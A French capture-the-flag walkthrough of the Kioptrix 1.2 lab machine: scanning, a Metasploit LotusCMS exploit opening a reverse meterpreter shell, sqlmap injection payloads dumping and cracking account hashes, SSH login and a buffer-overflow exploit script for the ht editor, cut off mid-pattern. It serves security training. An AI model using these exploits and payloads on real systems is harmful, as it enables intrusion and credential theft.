Kioptrix 1.2 (Lvl 3)
Retour
Enumération
Nmap
Recherche de la machine cible :
root@Kali:~/kioptrix-1-2# nmap 192.168.122.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-17 08:48 CET
Nmap scan report for 192.168.122.1
Host is up (0.00031s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
53/tcp open domain
MAC Address: FE:54:00:48:49:8A (Unknown)
Nmap scan report for 192.168.122.188
Host is up (0.0026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 52:54:00:48:49:8A (QEMU virtual NIC)
Nmap scan report for Kali (192.168.122.197)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (3 hosts up) scanned in 15.35 seconds
Ici l’ip en 188 est celle de notre cible.
dirb
root@Kali:~/kioptrix-1-2# dirb http://192.168.122.188
---- Scanning URL: http://192.168.122.188/ ----
==> DIRECTORY: http://192.168.122.188/cache/
==> DIRECTORY: http://192.168.122.188/core/
+ http://192.168.122.188/data (CODE:403|SIZE:326)
+ http://192.168.122.188/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.122.188/gallery/
+ http://192.168.122.188/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.122.188/modules/
==> DIRECTORY: http://192.168.122.188/phpmyadmin/
+ http://192.168.122.188/server-status (CODE:403|SIZE:335)
==> DIRECTORY: http://192.168.122.188/style/
---- Entering directory: http://192.168.122.188/cache/ ----
+ http://192.168.122.188/cache/index.html (CODE:200|SIZE:1819)
---- Entering directory: http://192.168.122.188/core/ ----
==> DIRECTORY: http://192.168.122.188/core/controller/
+ http://192.168.122.188/core/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.122.188/core/lib/
==> DIRECTORY: http://192.168.122.188/core/model/
==> DIRECTORY: http://192.168.122.188/core/view/
---- Entering directory: http://192.168.122.188/gallery/ ----
+ http://192.168.122.188/gallery/index.php (CODE:500|SIZE:5650)
==> DIRECTORY: http://192.168.122.188/gallery/photos/
==> DIRECTORY: http://192.168.122.188/gallery/themes/
---- Entering directory: http://192.168.122.188/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/ ----
+ http://192.168.122.188/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.122.188/phpmyadmin/index.php (CODE:200|SIZE:8136)
==> DIRECTORY: http://192.168.122.188/phpmyadmin/js/
==> DIRECTORY: http://192.168.122.188/phpmyadmin/lang/
+ http://192.168.122.188/phpmyadmin/libraries (CODE:403|SIZE:342)
+ http://192.168.122.188/phpmyadmin/phpinfo.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.122.188/phpmyadmin/scripts/
==> DIRECTORY: http://192.168.122.188/phpmyadmin/themes/
---- Entering directory: http://192.168.122.188/style/ ----
+ http://192.168.122.188/style/admin.php (CODE:200|SIZE:356)
+ http://192.168.122.188/style/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/controller/ ----
+ http://192.168.122.188/core/controller/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/lib/ ----
+ http://192.168.122.188/core/lib/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/model/ ----
+ http://192.168.122.188/core/model/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/core/view/ ----
+ http://192.168.122.188/core/view/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.122.188/gallery/photos/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/gallery/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.122.188/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Mar 17 09:09:53 2018
DOWNLOADED: 46120 - FOUND: 17
Comme on le vois ici, pas mal de dossier listable laissant penser à une mauvaise configuration du serveur web.
Nikto
root@Kali:~/kioptrix-1-2# nikto -host http://192.168.122.188
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.122.188
+ Target Hostname: 192.168.122.188
+ Target Port: 80
+ Start Time: 2018-03-17 09:12:42 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 21:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2018-03-17 09:13:06 (GMT1) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
On trouve ici également quelques informations intéressantes pour la suite.
Exploitation
On passe à la phase intéressante avec la phase d’exploitation. Voici une liste des failles potentielles :
phpMyAdmin 2.11.3deb1ubuntu1.3LotusCMS
searchsploit
root@Kali:~# searchsploit phpmyadmin 2.11
-------------------------------------------------------------- ----------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------
phpMyAdmin 2.11.1 - 'Server_Status.php' Cross-Site Scripting | exploits/php/webapps/30733.txt
phpMyAdmin 2.11.1 - 'setup.php' Cross-Site Scripting | exploits/php/webapps/30653.txt
-------------------------------------------------------------- ----------
root@Kali:~# searchsploit lotuscms
-------------------------------------------------------------- ----------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt
-------------------------------------------------------------- ----------
Pour résumer :
- Deux failles XSS pour phpMyAdmin (difficile à exploiter)
- Un exploit Metasploit pour lotusCMS
Exploitation de lotusCMS
msf > use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.122.188
RHOST => 192.168.122.188
msf exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.122.188 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.122.197 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf exploit(multi/http/lcms_php_exec) > run
[*] Started reverse TCP handler on 192.168.122.197:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (37543 bytes) to 192.168.122.188
[*] Meterpreter session 2 opened (192.168.122.197:4444 -> 192.168.122.188:49110) at 2018-03-17 22:07:28 +0100
meterpreter >
On a ici un joli reverse shell avec meterpreter, tentons un shell :
meterpreter > shell
Process 4319 created.
Channel 1 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$
On obtient ici grâce à python un shell interactif plus utilisable que celui d’origine.
Escalade des privilèges
Pour rappel on dois finir root sur la machine cible, utilisons ExploitSuggest.py dans un premiers temps :
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- < 2.6.29 exit_notify() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8369 || Language=c
- 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation || http://www.exploit-db.com/exploits/9844 || Language=python
- < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit || http://www.exploit-db.com/exploits/14814 || Language=c
- 2.x sock_sendpage() Local Root Exploit 2 || http://www.exploit-db.com/exploits/9436 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
- 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || http://www.exploit-db.com/exploits/9479 || Language=c
- 2.6 UDEV < 141 Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8572 || Language=c
- 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit || http://www.exploit-db.com/exploits/5092 || Language=c
- Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit || http://www.exploit-db.com/exploits/9083 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit [2] || http://www.exploit-db.com/exploits/9598 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- Linux RDS Protocol Local Privilege Escalation || http://www.exploit-db.com/exploits/15285 || Language=c
- 2.6.x ptrace_attach Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8673 || Language=c
- 2.x sock_sendpage() Local Ring0 Root Exploit || http://www.exploit-db.com/exploits/9435 || Language=c
- Test Kernel Local Root Exploit 0day || http://www.exploit-db.com/exploits/9191 || Language=c
- 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || http://www.exploit-db.com/exploits/926 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || http://www.exploit-db.com/exploits/9545 || Language=c
- 2.6 UDEV Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/8478 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- < 2.6.36.2 Econet Privilege Escalation Exploit || http://www.exploit-db.com/exploits/17787 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby
- < 2.6.37-rc2 ACPI custom_method Privilege Escalation || http://www.exploit-db.com/exploits/15774 || Language=c
- 'pipe.c' Local Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/10018 || Language=sh
- 2.4/2.6 sock_sendpage() Local Root Exploit [3] || http://www.exploit-db.com/exploits/9641 || Language=c
- <= 2.6.37 Local Privilege Escalation || http://www.exploit-db.com/exploits/15704 || Language=c
- 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/895 || Language=c
Finished
Qu’est-ce qui écoute sur le serveur ?
netstat -paunt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 192.168.122.188:41615 192.168.122.197:4444 ESTABLISHED 4282/sh
tcp6 0 0 :::80 :::* LISTEN 4282/sh
tcp6 0 0 :::22 :::* LISTEN -
tcp6 1 0 192.168.122.188:80 192.168.122.197:37961 CLOSE_WAIT 4282/sh
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
De façon rapide :
- Mysql (3306)
- bootpc (68 mais à vérifier)
On va également regarder du cotés des applications qui tournent sur le serveur :
- LotusCMS
- PhpMyAdmin
- Gallarific
En naviguant sur la galerie on remarque que l’URL prend une forme intéressante :
http://kioptrix3.com/gallery/gallery.php?id=1
Ceci nous laisse penser à une injection SQL éventuelle. Testons notre hypothèse :
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1"
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-8387 OR 3370=3370#
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(5785,4618)>(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(5785=5785,1
))),0x71706b7071,FLOOR(RAND(0)*2))x FROM (SELECT 4549 UNION SELECT 6519 UNION SELECT 3605 UNION S
ELECT 8414)a GROUP BY x)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x717a706a71,0x744f77655a4d56724f7368705753584f436c5365
524745596a416d6955584e5574634f57704e4474,0x71706b7071),NULL,NULL,NULL,NULL,NULL-- yRNq
---
[23:19:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
Nous avons vu juste ! Place au dump :
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump
[23:22:53] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[23:22:53] [INFO] the SQL query used returns 3 entries
[23:22:53] [INFO] the SQL query used returns 3 entries
[23:22:53] [INFO] retrieved: id
[23:22:53] [INFO] retrieved: int(10)
[23:22:53] [INFO] retrieved: username
[23:22:53] [INFO] retrieved: varchar(50)
[23:22:53] [INFO] retrieved: password
[23:22:53] [INFO] retrieved: varchar(50)
[23:22:53] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[23:22:53] [INFO] the SQL query used returns 2 entries
[23:22:53] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[23:22:53] [WARNING] automatically patching output having last char trimmed
[23:22:53] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[23:22:53] [INFO] recognized possible password hashes in column 'password'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:23:32] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[23:23:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[23:23:36] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:23:36] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[23:23:50] [INFO] cracked password 'Mast3r' for user 'dreg'
[23:23:55] [INFO] cracked password 'starwars' for user 'loneferret'
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username | password |
+----+------------+---------------------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
On a donc ici récupéré l’accès à deux comptes. Tentons de les utiliser sur SSH :
root@Kali:~# ssh loneferret@192.168.122.188
loneferret@192.168.122.188's password:
loneferret@Kioptrix3:~$
root@Kali:~# ssh dreg@192.168.122.188
dreg@192.168.122.188's password:
dreg@Kioptrix3:~$
L’erreur ici est d’avoir utilisé les mêmes mots de passe partout. Tentons maintenant de trouver des informations exploitables.
Est-ce qu’on peu utiliser sudo ?
dreg@Kioptrix3:~$ sudo -l
[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
Visiblement, loneferret a des droits avec sudo, examinons son dossier home :
loneferret@Kioptrix3:~$ ls -al
total 144
drwxr-xr-x 3 loneferret loneferret 4096 Apr 14 04:10 .
drwxr-xr-x 5 root root 4096 Apr 16 2011 ..
-rw-r--r-- 1 loneferret users 2131 Apr 14 04:50 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 Apr 11 2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 Apr 11 2011 .bashrc
-rw-r--r-- 1 root root 1745 Apr 14 03:56 .htcfg2
-rw------- 1 loneferret users 40 Apr 1 17:39 .mysql_history
-rw------- 1 root root 15 Apr 15 2011 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 Apr 11 2011 .profile
drwx------ 2 loneferret loneferret 4096 Apr 14 2011 .ssh
-rw-r--r-- 1 loneferret loneferret 0 Apr 11 2011 .sudo_as_admin_successful
-rw-r--r-- 1 root root 215 Apr 14 03:49 CompanyPolicy.README
Lisons le contenu de Company Policy.README:
Hello,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
HT editor est un éditeur hexa visant à modifier et analyser des exécutables. Vérifions la version installée :
loneferret@Kioptrix3:~$ ht -v
ht 2.0.18 (POSIX) 07:26:02 on Apr 16 2011
(c) 1999-2004 Stefan Weyergraf
(c) 1999-2009 Sebastian Biallas <sb@biallas.net>
Suite à des recherches on trouve un exploit python permettant l’exploitation de l’éditeur :
#!/usr/bin/python
# Run with: ht $(python shellcode.py)
# Buffer on 4400 -> root@bt:/opt/metasploit/msf3/tools# ruby pattern_create.rb 4400
bufferoverflow="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2E